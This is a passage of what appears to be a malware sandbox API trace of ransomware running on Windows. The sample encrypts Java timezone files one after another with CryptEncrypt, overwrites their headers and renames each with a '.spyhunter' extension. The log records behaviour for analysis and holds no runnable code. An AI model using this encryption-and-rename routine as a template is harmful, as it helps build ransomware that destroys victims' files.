[0127.877] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.877] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x248f784, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f784*=0x1b, lpOverlapped=0x0) returned 1 [0127.877] GetProcessHeap () returned 0x2c0000 [0127.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0127.877] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.877] WriteFile (in: hFile=0xec, lpBuffer=0x248f7c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f784, lpOverlapped=0x0 | out: lpBuffer=0x248f7c4*, lpNumberOfBytesWritten=0x248f784*=0x4, lpOverlapped=0x0) returned 1 [0127.877] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f784, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f784*=0x30, lpOverlapped=0x0) returned 1 [0127.877] CloseHandle (hObject=0xec) returned 1 [0127.877] GetProcessHeap () returned 0x2c0000 [0127.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0127.877] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-5.spyhunter") returned 63 [0127.878] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-5" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-5"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-5.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-5.spyhunter")) returned 1 [0127.878] GetProcessHeap () returned 0x2c0000 [0127.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0127.878] GetProcessHeap () returned 0x2c0000 [0127.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0127.878] GetProcessHeap () returned 0x2c0000 [0127.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0ac8 | out: hHeap=0x2c0000) returned 1 [0127.878] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f7c8 | out: pbBuffer=0x248f7c8) returned 1 [0127.878] GetProcessHeap () returned 0x2c0000 [0127.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0127.878] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f7c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f7c0*=0x30) returned 1 [0127.878] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-4" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0127.879] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-4") returned 53 [0127.879] StrStrW (lpFirst="GMT-4", lpSrch=".txt") returned 0x0 [0127.879] GetProcessHeap () returned 0x2c0000 [0127.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0127.879] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f784, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f784*=0x1b, lpOverlapped=0x0) returned 1 [0127.880] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.880] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x248f784, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f784*=0x1b, lpOverlapped=0x0) returned 1 [0127.880] GetProcessHeap () returned 0x2c0000 [0127.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0127.880] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.880] WriteFile (in: hFile=0xec, lpBuffer=0x248f7c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f784, lpOverlapped=0x0 | out: lpBuffer=0x248f7c4*, lpNumberOfBytesWritten=0x248f784*=0x4, lpOverlapped=0x0) returned 1 [0127.880] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f784, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f784*=0x30, lpOverlapped=0x0) returned 1 [0127.880] CloseHandle (hObject=0xec) returned 1 [0127.880] GetProcessHeap () returned 0x2c0000 [0127.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0127.880] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-4.spyhunter") returned 63 [0127.881] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-4" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-4"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-4.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-4.spyhunter")) returned 1 [0127.881] GetProcessHeap () returned 0x2c0000 [0127.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0127.881] GetProcessHeap () returned 0x2c0000 [0127.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0127.881] GetProcessHeap () returned 0x2c0000 [0127.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0a10 | out: hHeap=0x2c0000) returned 1 [0127.881] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f7c0 | out: pbBuffer=0x248f7c0) returned 1 [0127.881] GetProcessHeap () returned 0x2c0000 [0127.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0127.882] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f7b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f7b8*=0x30) returned 1 [0127.882] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-3" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0127.882] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-3") returned 53 [0127.882] StrStrW (lpFirst="GMT-3", lpSrch=".txt") returned 0x0 [0127.882] GetProcessHeap () returned 0x2c0000 [0127.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0127.882] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f77c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f77c*=0x1b, lpOverlapped=0x0) returned 1 [0127.883] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.883] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x248f77c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f77c*=0x1b, lpOverlapped=0x0) returned 1 [0127.883] GetProcessHeap () returned 0x2c0000 [0127.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0127.883] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.883] WriteFile (in: hFile=0xec, lpBuffer=0x248f7bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f77c, lpOverlapped=0x0 | out: lpBuffer=0x248f7bc*, lpNumberOfBytesWritten=0x248f77c*=0x4, lpOverlapped=0x0) returned 1 [0127.883] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f77c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f77c*=0x30, lpOverlapped=0x0) returned 1 [0127.883] CloseHandle (hObject=0xec) returned 1 [0127.884] GetProcessHeap () returned 0x2c0000 [0127.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0127.884] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-3.spyhunter") returned 63 [0127.884] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-3" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-3"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-3.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-3.spyhunter")) returned 1 [0127.884] GetProcessHeap () returned 0x2c0000 [0127.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0127.884] GetProcessHeap () returned 0x2c0000 [0127.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0127.884] GetProcessHeap () returned 0x2c0000 [0127.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0958 | out: hHeap=0x2c0000) returned 1 [0127.885] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f7c0 | out: pbBuffer=0x248f7c0) returned 1 [0127.885] GetProcessHeap () returned 0x2c0000 [0127.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0127.885] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f7b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f7b8*=0x30) returned 1 [0127.885] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-2" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0127.885] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-2") returned 53 [0127.886] StrStrW (lpFirst="GMT-2", lpSrch=".txt") returned 0x0 [0127.886] GetProcessHeap () returned 0x2c0000 [0127.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0127.886] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f77c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f77c*=0x1b, lpOverlapped=0x0) returned 1 [0127.886] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.886] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x248f77c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f77c*=0x1b, lpOverlapped=0x0) returned 1 [0127.887] GetProcessHeap () returned 0x2c0000 [0127.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0127.887] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.887] WriteFile (in: hFile=0xec, lpBuffer=0x248f7bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f77c, lpOverlapped=0x0 | out: lpBuffer=0x248f7bc*, lpNumberOfBytesWritten=0x248f77c*=0x4, lpOverlapped=0x0) returned 1 [0127.887] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f77c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f77c*=0x30, lpOverlapped=0x0) returned 1 [0127.887] CloseHandle (hObject=0xec) returned 1 [0127.887] GetProcessHeap () returned 0x2c0000 [0127.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0127.887] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-2.spyhunter") returned 63 [0127.887] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-2" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-2"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-2.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-2.spyhunter")) returned 1 [0127.888] GetProcessHeap () returned 0x2c0000 [0127.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0127.888] GetProcessHeap () returned 0x2c0000 [0127.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0127.888] GetProcessHeap () returned 0x2c0000 [0127.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec08a0 | out: hHeap=0x2c0000) returned 1 [0127.888] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f7b8 | out: pbBuffer=0x248f7b8) returned 1 [0127.888] GetProcessHeap () returned 0x2c0000 [0127.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0127.888] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f7b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f7b0*=0x30) returned 1 [0127.888] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-14" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-14"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0127.888] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-14") returned 54 [0127.888] StrStrW (lpFirst="GMT-14", lpSrch=".txt") returned 0x0 [0127.888] GetProcessHeap () returned 0x2c0000 [0127.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0127.889] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f774, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f774*=0x1b, lpOverlapped=0x0) returned 1 [0127.889] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.889] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x248f774, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f774*=0x1b, lpOverlapped=0x0) returned 1 [0127.890] GetProcessHeap () returned 0x2c0000 [0127.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0127.890] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.890] WriteFile (in: hFile=0xec, lpBuffer=0x248f7b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f774, lpOverlapped=0x0 | out: lpBuffer=0x248f7b4*, lpNumberOfBytesWritten=0x248f774*=0x4, lpOverlapped=0x0) returned 1 [0127.890] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f774, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f774*=0x30, lpOverlapped=0x0) returned 1 [0127.890] CloseHandle (hObject=0xec) returned 1 [0127.890] GetProcessHeap () returned 0x2c0000 [0127.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0127.890] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-14.spyhunter") returned 64 [0127.890] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-14" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-14"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-14.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-14.spyhunter")) returned 1 [0127.891] GetProcessHeap () returned 0x2c0000 [0127.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0127.891] GetProcessHeap () returned 0x2c0000 [0127.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0127.891] GetProcessHeap () returned 0x2c0000 [0127.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec07e8 | out: hHeap=0x2c0000) returned 1 [0127.891] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f7b8 | out: pbBuffer=0x248f7b8) returned 1 [0127.891] GetProcessHeap () returned 0x2c0000 [0127.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0127.891] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f7b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f7b0*=0x30) returned 1 [0127.891] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-13" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-13"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0127.892] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-13") returned 54 [0127.892] StrStrW (lpFirst="GMT-13", lpSrch=".txt") returned 0x0 [0127.892] GetProcessHeap () returned 0x2c0000 [0127.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0127.892] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f774, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f774*=0x1b, lpOverlapped=0x0) returned 1 [0127.892] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.892] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x248f774, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f774*=0x1b, lpOverlapped=0x0) returned 1 [0127.893] GetProcessHeap () returned 0x2c0000 [0127.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0127.893] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.893] WriteFile (in: hFile=0xec, lpBuffer=0x248f7b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f774, lpOverlapped=0x0 | out: lpBuffer=0x248f7b4*, lpNumberOfBytesWritten=0x248f774*=0x4, lpOverlapped=0x0) returned 1 [0127.893] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f774, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f774*=0x30, lpOverlapped=0x0) returned 1 [0127.893] CloseHandle (hObject=0xec) returned 1 [0127.893] GetProcessHeap () returned 0x2c0000 [0127.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0127.893] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-13.spyhunter") returned 64 [0127.893] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-13" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-13"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-13.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-13.spyhunter")) returned 1 [0127.894] GetProcessHeap () returned 0x2c0000 [0127.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0127.894] GetProcessHeap () returned 0x2c0000 [0127.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0127.894] GetProcessHeap () returned 0x2c0000 [0127.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0730 | out: hHeap=0x2c0000) returned 1 [0127.894] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f7b0 | out: pbBuffer=0x248f7b0) returned 1 [0127.894] GetProcessHeap () returned 0x2c0000 [0127.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0127.894] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f7a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f7a8*=0x30) returned 1 [0127.894] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-12" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-12"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0127.894] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-12") returned 54 [0127.894] StrStrW (lpFirst="GMT-12", lpSrch=".txt") returned 0x0 [0127.894] GetProcessHeap () returned 0x2c0000 [0127.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0127.894] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f76c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f76c*=0x1b, lpOverlapped=0x0) returned 1 [0127.895] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.895] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x248f76c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f76c*=0x1b, lpOverlapped=0x0) returned 1 [0127.895] GetProcessHeap () returned 0x2c0000 [0127.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0127.895] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.895] WriteFile (in: hFile=0xec, lpBuffer=0x248f7ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f76c, lpOverlapped=0x0 | out: lpBuffer=0x248f7ac*, lpNumberOfBytesWritten=0x248f76c*=0x4, lpOverlapped=0x0) returned 1 [0127.895] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f76c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f76c*=0x30, lpOverlapped=0x0) returned 1 [0127.896] CloseHandle (hObject=0xec) returned 1 [0127.896] GetProcessHeap () returned 0x2c0000 [0127.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0127.896] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-12.spyhunter") returned 64 [0127.896] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-12" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-12"), lpNewFileName="\\\\?\\C:\\Program Files 